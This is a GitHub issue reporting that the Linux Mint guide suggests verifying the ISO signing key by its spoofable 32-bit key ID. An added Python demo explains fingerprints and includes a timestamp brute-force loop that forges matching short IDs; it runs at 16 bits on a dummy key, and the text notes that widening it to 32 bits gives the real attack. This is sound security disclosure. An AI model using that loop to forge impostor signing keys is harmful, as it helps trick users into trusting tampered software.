
Security issue: deprecated 32-bit key ID is recommended for verification of the Linux Mint ISO #17

@morton-f

I checked the English and several other language guides and found out that an OpenPGP 32-bit key ID is recommended as an alternative for verifying an ISO.

Linux Mint Installation Guide --> Verify your ISO image --> Authenticity check

    If gpg complains about the key ID, try the following commands instead:
    gpg --keyserver hkp://keyserver.ubuntu.com:80 --recv-key A25BAE09
    gpg --list-key --with-fingerprint A25BAE09

Check the output of the last command, to make sure the fingerprint is 27DE B156 44C6 B3CF 3BD7 D291 300F 846B A25B AE09 (with or without spaces).

results in

pub   rsa1024 2014-01-26 [C]
      1828 C98D 1C52 E20C 95DF  B632 6ABA 455A A25B AE09
uid           [ unknown] Totally Legit Signing Key <[email protected]>

There are some users in the wild, including on the Linux Mint forum, who are not familiar enough with GnuPG to resolve the problem even if they see that the signature is wrong. It is a well-known issue, and only full 64-bit identifiers should be used. See:
https://github.com/jwilk/stopgp32
https://seclists.org/oss-sec/2018/q3/174
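Added example (not part of the issue above, and not Linux Mint's or GnuPG's code): the script below shows why a 32-bit key ID cannot authenticate a key. A v4 key ID is only the tail of the SHA-1 fingerprint of the public-key packet, and that packet includes the creation timestamp, so an attacker can keep the same RSA key and walk the timestamp until the low bits of the fingerprint match the victim's ID. The two fingerprints quoted in the issue are used as-is; the RSA modulus is a constructed dummy (not a real key), and the search is run at a reduced 16-bit width so it finishes in seconds, where the real attack on 32 bits needs on the order of 2**32 hashes. The only check that holds up is comparing the full fingerprint, which `fingerprint_matches` does.

```python
"""Demonstrates that an OpenPGP 32-bit key ID is just the low bits of a
SHA-1 fingerprint over a packet the attacker controls (RFC 4880, 12.2).
Added example; dummy key material, not a real key."""
import hashlib
import struct

# Fingerprints quoted in the issue: the one from the Mint guide and the
# look-alike key the keyserver returned for the short ID A25BAE09.
MINT_FPR = "27DE B156 44C6 B3CF 3BD7 D291 300F 846B A25B AE09"
FAKE_FPR = "1828 C98D 1C52 E20C 95DF  B632 6ABA 455A A25B AE09"


def normalize(fpr: str) -> str:
    """Upper-case hex with all whitespace removed."""
    return "".join(fpr.split()).upper()


def fingerprint_matches(shown: str, expected: str) -> bool:
    """The check that actually authenticates a key: compare all 160 bits,
    tolerating the spaced or unspaced form gpg prints."""
    a, b = normalize(shown), normalize(expected)
    return len(a) == 40 and a == b


def key_id(fpr: str, bits: int) -> str:
    """A 32- or 64-bit key ID is simply the last bits//4 hex digits."""
    return normalize(fpr)[-(bits // 4):]


def mpi(x: int) -> bytes:
    """OpenPGP multi-precision integer: 2-byte bit length, then the value."""
    bits = x.bit_length()
    return struct.pack(">H", bits) + x.to_bytes((bits + 7) // 8, "big")


def rsa_pubkey_packet_body(creation_time: int, n: int, e: int) -> bytes:
    """Body of a v4 RSA public-key packet: version 4, creation time,
    algorithm 1 (RSA), then the n and e MPIs."""
    return b"\x04" + struct.pack(">I", creation_time) + b"\x01" + mpi(n) + mpi(e)


def v4_fingerprint(body: bytes) -> str:
    """SHA-1 over 0x99 || two-byte body length || body, as upper-case hex."""
    return hashlib.sha1(b"\x99" + struct.pack(">H", len(body)) + body).hexdigest().upper()


def forge_short_id(target_fpr: str, n: int, e: int, bits: int = 16,
                   start_time: int = 1390694400, max_tries: int = 1 << 20):
    """Walk the creation timestamp (starting near the 2014-01-26 date the
    fake key shows) until the low `bits` of the fingerprint equal the
    target's.  Returns (timestamp, fingerprint) or None.  bits=32 is the
    real attack; 16 keeps this demo to a fraction of a second."""
    want = key_id(target_fpr, bits)
    for t in range(start_time, start_time + max_tries):
        fpr = v4_fingerprint(rsa_pubkey_packet_body(t, n, e))
        if fpr[-(bits // 4):] == want:
            return t, fpr
    return None


# Constructed dummy modulus: 1024 deterministic bits, NOT a real RSA key.
DEMO_N = int.from_bytes(hashlib.sha512(b"demo-modulus-a").digest()
                        + hashlib.sha512(b"demo-modulus-b").digest(), "big") | (1 << 1023) | 1
DEMO_E = 65537


if __name__ == "__main__":
    print("32-bit ID, real key:", key_id(MINT_FPR, 32))
    print("32-bit ID, fake key:", key_id(FAKE_FPR, 32))
    print("64-bit ID, real key:", key_id(MINT_FPR, 64))
    print("64-bit ID, fake key:", key_id(FAKE_FPR, 64))
    print("full fingerprint matches:", fingerprint_matches(FAKE_FPR, MINT_FPR))
    hit = forge_short_id(MINT_FPR, DEMO_N, DEMO_E)
    if hit:
        t, fpr = hit
        print(f"16-bit collision after {t - 1390694400} tries: {fpr}")
```

Running it prints the identical 32-bit ID `A25BAE09` for both keys, different 64-bit IDs, `False` for the full comparison, and then a dummy key whose fingerprint ends in the same four hex digits as the Mint key after a few tens of thousands of timestamp tries. Raising `bits` to 32 turns the loop into the real attack; the cost grows by 2**16 but nothing else changes, which is the point of the linked references.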
